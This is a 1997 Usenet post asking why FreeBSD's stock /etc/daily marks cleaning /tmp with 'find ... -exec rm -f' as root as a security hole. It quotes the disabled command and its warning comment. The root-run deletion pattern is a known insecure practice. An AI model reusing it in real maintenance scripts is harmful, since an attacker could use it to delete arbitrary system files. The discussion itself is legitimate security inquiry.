Return to BSD News archive
Path: euryale.cc.adfa.oz.au!newshost.carno.net.au!harbinger.cc.monash.edu.au!munnari.OZ.AU!news.ecn.uoknor.edu!feed1.news.erols.com!howland.erols.net!newsxfer.itd.umich.edu!yale!oitnews.harvard.edu!purdue!mozo.cc.purdue.edu!schwinger.physics.purdue.edu!ajk From: ajk@schwinger.physics.purdue.edu (Andrew J. Korty) Newsgroups: comp.security.unix,comp.unix.bsd.freebsd.misc Subject: Why is cleaning /tmp with find a security problem? Date: 20 Mar 1997 02:01:42 GMT Organization: Purdue University Lines: 16 Message-ID: <5gq5q6$cst@mozo.cc.purdue.edu> NNTP-Posting-Host: schwinger.physics.purdue.edu Xref: euryale.cc.adfa.oz.au comp.security.unix:32761 comp.unix.bsd.freebsd.misc:37322 From the stock /etc/daily distributed with FreeBSD: # This is a security hole, never use 'find' on a public directory # with -exec rm -f as root. This can be exploited to delete any file # on the system. # #find / \( ! -fstype local -o -fstype rdonly \) -a -prune -o \ # \( -name '[#,]*' -o -name '.#*' -o -name a.out -o -name '*.core' \ # -o -name '*.CKP' -o -name '.emacs_[0-9]*' \) \ # -a -atime +3 -exec rm -f -- {} \; Why? The first thing that comes to mind is that it has to do with symbolic links, but "find" won't follow them unless you tell it to. Am I missing something obvious? ajk